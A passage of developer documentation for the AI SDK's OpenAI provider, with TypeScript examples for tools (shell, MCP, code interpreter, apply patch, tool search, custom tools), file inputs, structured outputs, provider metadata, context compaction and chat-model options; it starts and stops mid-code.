prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: openai.tools.imageGeneration({ outputFormat: 'webp' }),
},
});
for (const toolResult of result.staticToolResults) {
if (toolResult.toolName === 'image_generation') {
const base64Image = toolResult.output.result;
}
}
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai('gpt-5'),
prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: openai.tools.imageGeneration({
outputFormat: 'webp',
quality: 'low',
}),
},
});
for await (const part of result.fullStream) {
if (part.type === 'tool-result' && !part.dynamic) {
const base64Image = part.output.result;
}
}
For complete details on model availability, image quality controls, supported sizes, and tool-specific parameters, refer to the OpenAI documentation:
- Image generation overview and models: OpenAI Image Generation
- Image generation tool parameters (background, size, quality, format, etc.): Image Generation Tool Options
Code Interpreter Tool
The OpenAI responses API supports the code interpreter tool through the openai.tools.codeInterpreter tool.
This allows models to write and execute Python code.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Write and run Python code to calculate the factorial of 10',
tools: {
code_interpreter: openai.tools.codeInterpreter({
// optional configuration:
container: {
fileIds: ['file-123', 'file-456'], // optional file IDs to make available
},
}),
},
});
The code interpreter tool can be configured with:
- container: Either a container ID string or an object with
fileIds to specify uploaded files that should be available to the code interpreter
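Alternatively, pass an existing container ID directly as a string (ID illustrative):
code_interpreter: openai.tools.codeInterpreter({
  container: 'cntr_abc123',
}),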
MCP Tool
The OpenAI responses API supports connecting to Model Context Protocol (MCP) servers through the openai.tools.mcp tool. This allows models to call tools exposed by remote MCP servers or service connectors.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Search the web for the latest news about AI developments',
tools: {
mcp: openai.tools.mcp({
serverLabel: 'web-search',
serverUrl: 'https://mcp.exa.ai/mcp',
serverDescription: 'A web-search API for AI agents',
}),
},
});
The MCP tool can be configured with:
-
serverLabel string (required)
A label to identify the MCP server. This label is used in tool calls to distinguish between multiple MCP servers.
-
serverUrl string (required if connectorId is not provided)
The URL for the MCP server. Either serverUrl or connectorId must be provided. -
connectorId string (required if serverUrl is not provided)
Identifier for a service connector. Either serverUrl or connectorId must be provided. -
serverDescription string (optional)
Optional description of the MCP server that helps the model understand its purpose.
-
allowedTools string[] | object (optional)
Controls which tools from the MCP server are available. Can be:
- An array of tool names:
['tool1', 'tool2'] - An object with filters:
{
  readOnly: true, // Only allow read-only tools
  toolNames: ['tool1', 'tool2'], // Specific tool names
}
- An array of tool names:
-
authorization string (optional)
OAuth access token for authenticating with the MCP server or connector.
-
headers Record<string, string> (optional)
Optional HTTP headers to include in requests to the MCP server.
-
requireApproval 'always' | 'never' | object (optional)
Controls which MCP tool calls require user approval before execution. Can be:
- 'always': All MCP tool calls require approval
- 'never': No MCP tool calls require approval (default)
- An object with filters:
{
  never: {
    toolNames: ['safe_tool', 'another_safe_tool'], // Skip approval for these tools
  },
}
When approval is required, the model will return a
tool-approval-request content part that you can use to prompt the user for approval. See Human in the Loop for more details on implementing approval workflows.
Local Shell Tool
The OpenAI responses API supports the local shell tool for Codex models through the openai.tools.localShell tool.
Local shell is a tool that allows agents to run shell commands locally on a machine you or the user provides.
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: openai.responses('gpt-5-codex'),
tools: {
local_shell: openai.tools.localShell({
execute: async ({ action }) => {
// ... your implementation, e.g. sandbox access ...
return { output: stdout };
},
}),
},
prompt: 'List the files in my home directory.',
stopWhen: stepCountIs(2),
});
Shell Tool
The OpenAI Responses API supports the shell tool through the openai.tools.shell tool.
The shell tool allows running bash commands and interacting with a command line.
The model proposes shell commands; your integration executes them and returns the outputs.
The shell tool supports three environment modes that control where commands are executed:
Local Execution (default)
When no environment is specified (or type: 'local' is used), commands are executed locally via your execute callback:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
execute: async ({ action }) => {
// ... your implementation, e.g. sandbox access ...
return { output: results };
},
}),
},
prompt: 'List the files in the current directory and show disk usage.',
});
Hosted Container (auto)
Set environment.type to 'containerAuto' to run commands in an OpenAI-hosted container. No execute callback is needed — OpenAI handles execution server-side:
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
environment: {
type: 'containerAuto',
// optional configuration:
memoryLimit: '4g',
fileIds: ['file-abc123'],
networkPolicy: {
type: 'allowlist',
allowedDomains: ['example.com'],
},
},
}),
},
prompt: 'Install numpy and compute the eigenvalues of a 3x3 matrix.',
});
The containerAuto environment supports:
- fileIds string[] - File IDs to make available in the container
- memoryLimit '1g' | '4g' | '16g' | '64g' - Memory limit for the container
- networkPolicy - Network access policy:
- { type: 'disabled' } — no network access
- { type: 'allowlist', allowedDomains: string[], domainSecrets?: Array<{ domain, name, value }> } — allow specific domains with optional secrets
Existing Container Reference
Set environment.type to 'containerReference' to use an existing container by ID:
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
environment: {
type: 'containerReference',
containerId: 'cntr_abc123',
},
}),
},
prompt: 'Check the status of running processes.',
});
Execute Callback
For local execution (default or type: 'local'), your execute function must return an output array with results for each command (see the sketch after this list):
- stdout string - Standard output from the command
- stderr string - Standard error from the command
- outcome - Either
{ type: 'timeout' } or { type: 'exit', exitCode: number }
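A minimal local-execution sketch, assuming the proposed commands arrive on action.commands (check the action shape in your SDK version before relying on it):
import { openai } from '@ai-sdk/openai';
import { execFile } from 'node:child_process';
import { promisify } from 'node:util';
const run = promisify(execFile);
const shell = openai.tools.shell({
  execute: async ({ action }) => {
    const output: Array<{
      stdout: string;
      stderr: string;
      outcome: { type: 'exit'; exitCode: number };
    }> = [];
    for (const command of action.commands) {
      try {
        // run each proposed command and capture its streams
        const { stdout, stderr } = await run('bash', ['-c', command]);
        output.push({ stdout, stderr, outcome: { type: 'exit', exitCode: 0 } });
      } catch (error: any) {
        // execFile rejects on non-zero exit; recover the captured streams
        output.push({
          stdout: error.stdout ?? '',
          stderr: error.stderr ?? '',
          outcome: {
            type: 'exit',
            exitCode: typeof error.code === 'number' ? error.code : 1,
          },
        });
      }
    }
    return { output };
  },
});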
Skills
Skills are versioned bundles of files with a SKILL.md manifest that extend the shell tool's capabilities. They can be attached to both containerAuto and local environments.
Container skills support two formats — by reference (for skills uploaded to OpenAI) or inline (as a base64-encoded zip):
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
environment: {
type: 'containerAuto',
skills: [
// By reference:
{ type: 'skillReference', skillId: 'skill_abc123' },
// Or inline:
{
type: 'inline',
name: 'my-skill',
description: 'What this skill does',
source: {
type: 'base64',
mediaType: 'application/zip',
data: readFileSync('./my-skill.zip').toString('base64'),
},
},
],
},
}),
},
prompt: 'Use the skill to solve this problem.',
});
Local skills point to a directory on disk containing a SKILL.md file:
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
execute: async ({ action }) => {
// ... your local execution implementation ...
return { output: results };
},
environment: {
type: 'local',
skills: [
{
name: 'my-skill',
description: 'What this skill does',
path: resolve('path/to/skill-directory'),
},
],
},
}),
},
prompt: 'Use the skill to solve this problem.',
stopWhen: stepCountIs(5),
});
For more details on creating skills, see the OpenAI Skills documentation.
Apply Patch Tool
The OpenAI Responses API supports the apply patch tool for GPT-5.1 models through the openai.tools.applyPatch tool.
The apply patch tool lets the model create, update, and delete files in your codebase using structured diffs.
Instead of just suggesting edits, the model emits patch operations that your application applies and reports back on,
enabling iterative, multi-step code editing workflows.
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: openai('gpt-5.1'),
tools: {
apply_patch: openai.tools.applyPatch({
execute: async ({ callId, operation }) => {
// ... your implementation for applying the diffs.
},
}),
},
prompt: 'Create a python file that calculates the factorial of a number',
stopWhen: stepCountIs(5),
});
Your execute function must return (see the sketch after this list):
- status 'completed' | 'failed' - Whether the patch was applied successfully
- output string (optional) - Human-readable log text (e.g., results or error messages)
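A minimal sketch of the callback contract (applying the structured diff to your workspace is your code and is elided here):
apply_patch: openai.tools.applyPatch({
  execute: async ({ operation }) => {
    try {
      // apply the structured diff described by `operation` to your files here
      return { status: 'completed', output: 'Patch applied.' };
    } catch (error) {
      return { status: 'failed', output: String(error) };
    }
  },
}),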
Tool Search
Tool search allows the model to dynamically search for and load tools into context as needed,
rather than loading all tool definitions up front. This can reduce token usage, cost, and latency
when you have many tools. Mark the tools you want to make searchable with deferLoading: true
in their providerOptions.
There are two execution modes:
- Server-executed (hosted): OpenAI searches across the deferred tools declared in the request and returns the loaded subset in the same response. No extra round-trip is needed.
- Client-executed: The model emits a
tool_search_call, your application performs the lookup, and you return the matching tools via the execute callback.
Server-Executed (Hosted) Tool Search
Use hosted tool search when the candidate tools are already known at request time.
Add openai.tools.toolSearch() with no arguments and mark your tools with deferLoading: true:
import { openai } from '@ai-sdk/openai';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: openai.responses('gpt-5.4'),
prompt: 'What is the weather in San Francisco?',
stopWhen: stepCountIs(10),
tools: {
toolSearch: openai.tools.toolSearch(),
get_weather: tool({
description: 'Get the current weather at a specific location',
inputSchema: z.object({
location: z.string(),
unit: z.enum(['celsius', 'fahrenheit']),
}),
execute: async ({ location, unit }) => ({
location,
temperature: unit === 'celsius' ? 18 : 64,
}),
providerOptions: {
openai: { deferLoading: true },
},
}),
search_files: tool({
description: 'Search through files in the workspace',
inputSchema: z.object({ query: z.string() }),
execute: async ({ query }) => ({
results: [`Found 3 files matching "${query}"`],
}),
providerOptions: {
openai: { deferLoading: true },
},
}),
},
});
In hosted mode, the model internally searches the deferred tools, loads the relevant ones, and
proceeds to call them — all within a single response. The tool_search_call and
tool_search_output items appear in the response with execution: 'server' and call_id: null.
Client-Executed Tool Search
Use client-executed tool search when tool discovery depends on runtime state — for example,
tools that vary per tenant, project, or external system. Pass execution: 'client' along with
a description, parameters schema, and an execute callback:
import { openai } from '@ai-sdk/openai';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: openai.responses('gpt-5.4'),
prompt: 'What is the weather in San Francisco?',
stopWhen: stepCountIs(10),
tools: {
toolSearch: openai.tools.toolSearch({
execution: 'client',
description: 'Search for available tools based on what the user needs.',
parameters: {
type: 'object',
properties: {
goal: {
type: 'string',
description: 'What the user is trying to accomplish',
},
},
required: ['goal'],
additionalProperties: false,
},
execute: async ({ arguments: args }) => {
// Your custom tool discovery logic here.
// Return the tools that match the search goal.
return {
tools: [
{
type: 'function',
name: 'get_weather',
description: 'Get the current weather at a specific location',
deferLoading: true,
parameters: {
type: 'object',
properties: {
location: { type: 'string' },
},
required: ['location'],
additionalProperties: false,
},
},
],
};
},
}),
get_weather: tool({
description: 'Get the current weather at a specific location',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }) => ({
location,
temperature: 64,
condition: 'Partly cloudy',
}),
providerOptions: {
openai: { deferLoading: true },
},
}),
},
});
In client mode, the flow spans two steps:
- Step 1: The model emits a tool_search_call with execution: 'client' and a non-null call_id. The SDK calls your execute callback with the search arguments. Your callback returns the discovered tools.
- Step 2: The SDK sends the tool_search_output (with the matching call_id) back to the model. The model can now call the loaded tools as normal function calls.
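To observe this flow, you can inspect the steps of the result after the call completes, for example:

// Logs every tool call across all steps, including the tool_search call
// and the deferred tools the model invoked after they were loaded.
for (const step of result.steps) {
  for (const toolCall of step.toolCalls) {
    console.log(toolCall.toolName, JSON.stringify(toolCall.input));
  }
}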
For more details, see the OpenAI Tool Search documentation.
Custom Tool
The OpenAI Responses API supports custom tools through the openai.tools.customTool tool.
Custom tools return a raw string instead of JSON, optionally constrained to a grammar
(regex or Lark syntax). This makes them useful for generating structured text like
SQL queries, code snippets, or any output that must match a specific pattern.
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: openai.responses('gpt-5.2-codex'),
tools: {
write_sql: openai.tools.customTool({
description: 'Write a SQL SELECT query to answer the user question.',
format: {
type: 'grammar',
syntax: 'regex',
definition: 'SELECT .+',
},
execute: async input => {
// input is a raw string matching the grammar, e.g. "SELECT * FROM users WHERE age > 25"
const rows = await db.query(input);
return JSON.stringify(rows);
},
}),
},
toolChoice: 'required',
prompt: 'Write a SQL query to get all users older than 25.',
stopWhen: stepCountIs(3),
});
Custom tools also work with streamText:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai.responses('gpt-5.2-codex'),
tools: {
write_sql: openai.tools.customTool({
description: 'Write a SQL SELECT query to answer the user question.',
format: {
type: 'grammar',
syntax: 'regex',
definition: 'SELECT .+',
},
}),
},
toolChoice: 'required',
prompt: 'Write a SQL query to get all users older than 25.',
});
for await (const chunk of result.fullStream) {
if (chunk.type === 'tool-call') {
console.log(`Tool: ${chunk.toolName}`);
console.log(`Input: ${chunk.input}`);
}
}
The custom tool can be configured with:
- description string (optional) - A description of what the tool does, to help the model understand when to use it.
- format object (optional) - The output format constraint. Omit for unconstrained text output.
  - type 'grammar' | 'text' - The format type. Use 'grammar' for constrained output or 'text' for explicit unconstrained text.
  - syntax 'regex' | 'lark' - (grammar only) The grammar syntax. Use 'regex' for regular expression patterns or 'lark' for Lark parser grammar.
  - definition string - (grammar only) The grammar definition string (a regex pattern or Lark grammar).
- execute function (optional) - An async function that receives the raw string input and returns a string result. Enables multi-turn tool calling.
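As a short sketch of the 'text' format described above, here is a custom tool with explicitly unconstrained output (the tool name and prompt are illustrative):

import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5.2-codex'),
  tools: {
    take_notes: openai.tools.customTool({
      description: 'Write free-form meeting notes.',
      format: { type: 'text' }, // explicit unconstrained text output
      execute: async input => {
        // input is the raw note text produced by the model
        return `Saved ${input.length} characters of notes.`;
      },
    }),
  },
  prompt: 'Take notes on: the team shipped the new search feature.',
  stopWhen: stepCountIs(3),
});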
Image Inputs
The OpenAI Responses API supports image inputs for appropriate models. You can pass image files as part of the message content using the 'image' type:
const result = await generateText({
model: openai('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Please describe the image.',
},
{
type: 'image',
image: readFileSync('./data/image.png'),
},
],
},
],
});
The model will have access to the image and will respond to questions about it.
The image should be passed using the image field.
You can also pass a file-id from the OpenAI Files API.
{
type: 'image',
image: 'file-8EFBcWHsQxZV7YGezBC1fq'
}
You can also pass the URL of an image.
{
type: 'image',
image: 'https://sample.edu/image.png',
}
PDF Inputs
The OpenAI Responses API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: openai('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
You can also pass a file-id from the OpenAI Files API.
{
type: 'file',
data: 'file-8EFBcWHsQxZV7YGezBC1fq',
mediaType: 'application/pdf',
}
You can also pass the URL of a PDF.
{
type: 'file',
data: 'https://sample.edu/example.pdf',
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
}
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Structured Outputs
The OpenAI Responses API supports structured outputs. You can use generateText or streamText with Output to enforce structured outputs.
import { openai } from '@ai-sdk/openai';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: openai('gpt-4.1'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
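The validated object is then available on the result:

console.log(result.output.recipe.name);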
Typed providerMetadata in Text Parts
When using the OpenAI Responses API, the SDK attaches OpenAI-specific metadata to output parts via providerMetadata.
This metadata can be used on the client side for tasks such as rendering citations or downloading files generated by the Code Interpreter. To enable type-safe handling of this metadata, the AI SDK exports dedicated TypeScript types.
For text parts, when part.type === 'text', the providerMetadata is provided in the form of OpenaiResponsesTextProviderMetadata.
This metadata includes the following fields:
- itemId

  The ID of the output item in the Responses API.

- annotations (optional)

  An array of annotation objects generated by the model. If no annotations are present, this property itself may be omitted (undefined).

  Each element in annotations is a discriminated union with a required type field. Supported types include, for example:

  - url_citation
  - file_citation
  - container_file_citation
  - file_path
These annotations directly correspond to the annotation objects defined by the Responses API and can be used for inline reference rendering or output analysis. For details, see the official OpenAI documentation: Responses API – output text annotations.
import {
openai,
type OpenaiResponsesTextProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4.1-mini'),
prompt:
'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
tools: {
code_interpreter: openai.tools.codeInterpreter(),
web_search: openai.tools.webSearch(),
file_search: openai.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
},
});
for (const part of result.content) {
if (part.type === 'text') {
const providerMetadata = part.providerMetadata as
| OpenaiResponsesTextProviderMetadata
| undefined;
if (!providerMetadata) continue;
const { itemId: _itemId, annotations } = providerMetadata.openai;
if (!annotations) continue;
for (const annotation of annotations) {
switch (annotation.type) {
case 'url_citation':
// url_citation is returned from web_search and provides:
// properties: type, url, title, start_index and end_index
break;
case 'file_citation':
// file_citation is returned from file_search and provides:
// properties: type, file_id, filename and index
break;
case 'container_file_citation':
// container_file_citation is returned from code_interpreter and provides:
// properties: type, container_id, file_id, filename, start_index and end_index
break;
case 'file_path':
// file_path provides:
// properties: type, file_id and index
break;
default: {
const _exhaustiveCheck: never = annotation;
throw new Error(
`Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
);
}
}
}
}
}
Typed providerMetadata in Reasoning Parts
When using the OpenAI Responses API, reasoning output parts can include provider metadata.
To handle this metadata in a type-safe way, use OpenaiResponsesReasoningProviderMetadata.
For reasoning parts, when part.type === 'reasoning', the providerMetadata is provided in the form of OpenaiResponsesReasoningProviderMetadata.
This metadata includes the following fields:
- itemId

  The ID of the reasoning item in the Responses API.

- reasoningEncryptedContent (optional)

  Encrypted reasoning content (only returned when requested via include: ['reasoning.encrypted_content']).
import {
openai,
type OpenaiResponsesReasoningProviderMetadata,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'How many "r"s are in the word "strawberry"?',
providerOptions: {
openai: {
store: false,
include: ['reasoning.encrypted_content'],
} satisfies OpenAILanguageModelResponsesOptions,
},
});
for (const part of result.content) {
if (part.type === 'reasoning') {
const providerMetadata = part.providerMetadata as
| OpenaiResponsesReasoningProviderMetadata
| undefined;
const { itemId, reasoningEncryptedContent } =
providerMetadata?.openai ?? {};
console.log(itemId, reasoningEncryptedContent);
}
}
Typed providerMetadata in Source Document Parts
For source document parts, when part.type === 'source' and sourceType === 'document', the providerMetadata is provided as OpenaiResponsesSourceDocumentProviderMetadata.
This metadata is also a discriminated union with a required type field. Supported types include:
- file_citation
- container_file_citation
- file_path
Each type includes the identifiers required to work with the referenced resource, such as fileId and containerId.
import {
openai,
type OpenaiResponsesSourceDocumentProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4.1-mini'),
prompt:
'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
tools: {
code_interpreter: openai.tools.codeInterpreter(),
web_search: openai.tools.webSearch(),
file_search: openai.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
},
});
for (const part of result.content) {
if (part.type === 'source') {
if (part.sourceType === 'document') {
const providerMetadata = part.providerMetadata as
| OpenaiResponsesSourceDocumentProviderMetadata
| undefined;
if (!providerMetadata) continue;
const annotation = providerMetadata.openai;
switch (annotation.type) {
case 'file_citation':
// file_citation is returned from file_search and provides:
// properties: type, fileId and index
// The filename can be accessed via part.filename.
break;
case 'container_file_citation':
// container_file_citation is returned from code_interpreter and provides:
// properties: type, containerId and fileId
// The filename can be accessed via part.filename.
break;
case 'file_path':
// file_path provides:
// properties: type, fileId and index
break;
default: {
const _exhaustiveCheck: never = annotation;
throw new Error(
`Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
);
}
}
}
}
}
Compaction
The OpenAI Responses API supports server-side context compaction. When enabled, the server automatically compresses conversation context when token usage crosses a configured threshold. This is useful for long-running conversations or agent loops where you want to stay within token limits without manually managing context.
The compaction item returned by the server is opaque and encrypted — it carries forward key prior state and reasoning into the next turn using fewer tokens. The AI SDK handles this automatically: compaction items are returned as text parts with special providerMetadata, and when passed back in subsequent requests they are sent as compaction input items.
import {
openai,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-5.2'),
messages: conversationHistory,
providerOptions: {
openai: {
store: false,
contextManagement: [{ type: 'compaction', compactThreshold: 50000 }],
} satisfies OpenAILanguageModelResponsesOptions,
},
});
Configuration:
- type — Must be 'compaction'.
- compactThreshold — The token count at which compaction is triggered. When the rendered input token count crosses this threshold, the server runs a compaction pass before continuing inference.
Detecting Compaction in Streams
When using streamText, you can detect compaction by checking the providerMetadata on text-start and text-end events:
import {
openai,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai.responses('gpt-5.2'),
messages: conversationHistory,
providerOptions: {
openai: {
store: false,
contextManagement: [{ type: 'compaction', compactThreshold: 50000 }],
} satisfies OpenAILanguageModelResponsesOptions,
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'text-start': {
const isCompaction = part.providerMetadata?.openai?.type === 'compaction';
if (isCompaction) {
// ... your logic
}
break;
}
case 'text-end': {
const isCompaction = part.providerMetadata?.openai?.type === 'compaction';
if (isCompaction) {
// ... your logic
}
break;
}
case 'text-delta': {
process.stdout.write(part.text);
break;
}
}
}
Compaction in UI Applications
When using useChat or other UI hooks, compaction items appear as text parts with providerMetadata. You can detect and style them differently in your UI:
{
message.parts.map((part, index) => {
if (part.type === 'text') {
const isCompaction =
(part.providerMetadata?.openai as { type?: string } | undefined)
?.type === 'compaction';
if (isCompaction) {
return (
<div
key={index}
className="bg-yellow-100 border-l-4 border-yellow-500 p-2"
>
<span className="font-bold">[Context Compacted]</span>
<p className="text-sm text-yellow-700">
The server compressed the conversation context to reduce token
usage.
</p>
</div>
);
}
return <div key={index}>{part.text}</div>;
}
});
}
The metadata includes the following fields:
- type — Always 'compaction'.
- itemId string — The ID of the compaction item in the Responses API.
- encryptedContent string (optional) — The encrypted compaction state. This is automatically sent back to the API when the message is included in subsequent requests.
Chat Models
You can create models that call the OpenAI chat API using the .chat() factory method.
The first argument is the model id, e.g. gpt-4.
The OpenAI chat models support tool calls and some have multi-modal capabilities.
const model = openai.chat('gpt-5');
OpenAI chat models also support some model-specific provider options that are not part of the standard call settings.
You can pass them in the providerOptions argument:
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
const model = openai.chat('gpt-5');
await generateText({
model,
providerOptions: {
openai: {
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
user: 'test-user', // optional unique user identifier
} satisfies OpenAILanguageModelChatOptions,
},
});
The following optional provider options are available for OpenAI chat models:
- logitBias Record<number, number>

  Modifies the likelihood of specified tokens appearing in the completion.

  Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

  As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.

- logprobs boolean | number

  Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

  Setting to true will return the log probabilities of the tokens that were generated.

  Setting to a number will return the log probabilities of the top n tokens that were generated.

- parallelToolCalls boolean

  Whether to enable parallel function calling during tool use. Defaults to true.

- user string

  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

- reasoningEffort 'minimal' | 'low' | 'medium' | 'high' | 'xhigh'

  Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.

- maxCompletionTokens number

  Maximum number of completion tokens to generate. Useful for reasoning models.

- store boolean

  Whether to enable persistence in the Responses API.

- metadata Record<string, string>

  Metadata to associate with the request.

- prediction Record<string, any>

  Parameters for prediction mode.

- serviceTier 'auto' | 'flex' | 'priority' | 'default'

  Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported). Defaults to 'auto'.

- strictJsonSchema boolean

  Whether to use strict JSON schema validation. Defaults to true.

- textVerbosity 'low' | 'medium' | 'high'

  Controls the verbosity of the model's responses. Lower values will result in more concise responses, while higher values will result in more verbose responses.

- promptCacheKey string

  A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.

- promptCacheRetention 'in_memory' | '24h'

  The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.

- safetyIdentifier string

  A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.

- systemMessageMode 'system' | 'developer' | 'remove'

  Override the system message mode for this model. If not specified, the mode is automatically determined based on the model. system uses the 'system' role for system messages (default for most models); developer uses the 'developer' role (used by reasoning models); remove removes system messages entirely.

- forceReasoning boolean

  Force treating this model as a reasoning model. This is useful for "stealth" reasoning models (e.g. via a custom baseURL) where the model ID is not recognized by the SDK's allowlist. When enabled, the SDK applies reasoning-model parameter compatibility rules and defaults systemMessageMode to developer unless overridden.
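As a brief sketch combining a few of the options above (the prompt and cache key are illustrative):

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: openai.chat('gpt-5'),
  prompt: 'Summarize the plot of Hamlet in two sentences.',
  providerOptions: {
    openai: {
      serviceTier: 'flex', // cheaper, higher-latency processing
      textVerbosity: 'low', // more concise responses
      promptCacheKey: 'hamlet-summary-v1', // manual cache control
    } satisfies OpenAILanguageModelChatOptions,
  },
});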
Reasoning
OpenAI has introduced the o1, o3, and o4 series of reasoning models.
Currently, o4-mini, o3, o3-mini, and o1 are available via both the chat and responses APIs. The
model gpt-5.1-codex-mini is available only via the responses API.
Reasoning models currently only generate text, have several limitations, and are only supported using generateText and streamText.
They support additional settings and response metadata:
- You can use providerOptions to set the reasoningEffort option (or alternatively the reasoningEffort model setting), which determines the amount of reasoning the model performs.
- You can use the response providerMetadata to access the number of reasoning tokens that the model generated.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5'),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
openai: {
reasoningEffort: 'low',
} satisfies OpenAILanguageModelChatOptions,
},
});
console.log(text);
console.log('Usage:', {
...usage,
reasoningTokens: providerMetadata?.openai?.reasoningTokens,
});
- You can control how system messages are handled via the systemMessageMode provider option:
  - developer: treat the system prompt as a developer message (default for reasoning models).
  - system: keep the system message as a system-level instruction.
  - remove: remove the system message from the messages.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{ role: 'system', content: 'You are a helpful assistant.' },
{ role: 'user', content: 'Tell me a joke.' },
],
providerOptions: {
openai: {
systemMessageMode: 'system',
} satisfies OpenAILanguageModelChatOptions,
},
});
Strict Structured Outputs
Strict structured outputs are enabled by default.
You can disable them by setting the strictJsonSchema option to false.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: openai.chat('gpt-4o-2024-08-06'),
providerOptions: {
openai: {
strictJsonSchema: false,
} satisfies OpenAILanguageModelChatOptions,
},
output: Output.object({
schema: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
schemaName: 'recipe',
schemaDescription: 'A recipe for lasagna.',
}),
prompt: 'Generate a lasagna recipe.',
});
console.log(JSON.stringify(result.output, null, 2));
Strict JSON schemas restrict which schema features you can use. For example, optional schema properties are not supported: you need to change Zod .nullish() and .optional() to .nullable().
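For example, a strict-mode-friendly Zod schema replaces optional fields with nullable ones:

import { z } from 'zod';

// Not supported with strict JSON schema validation:
const loose = z.object({ note: z.string().optional() });

// Strict-mode friendly; the model emits null instead of omitting the field:
const strict = z.object({ note: z.string().nullable() });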
Logprobs
OpenAI provides logprobs information for completion/chat models.
You can access it in the providerMetadata object.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.chat('gpt-5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
openai: {
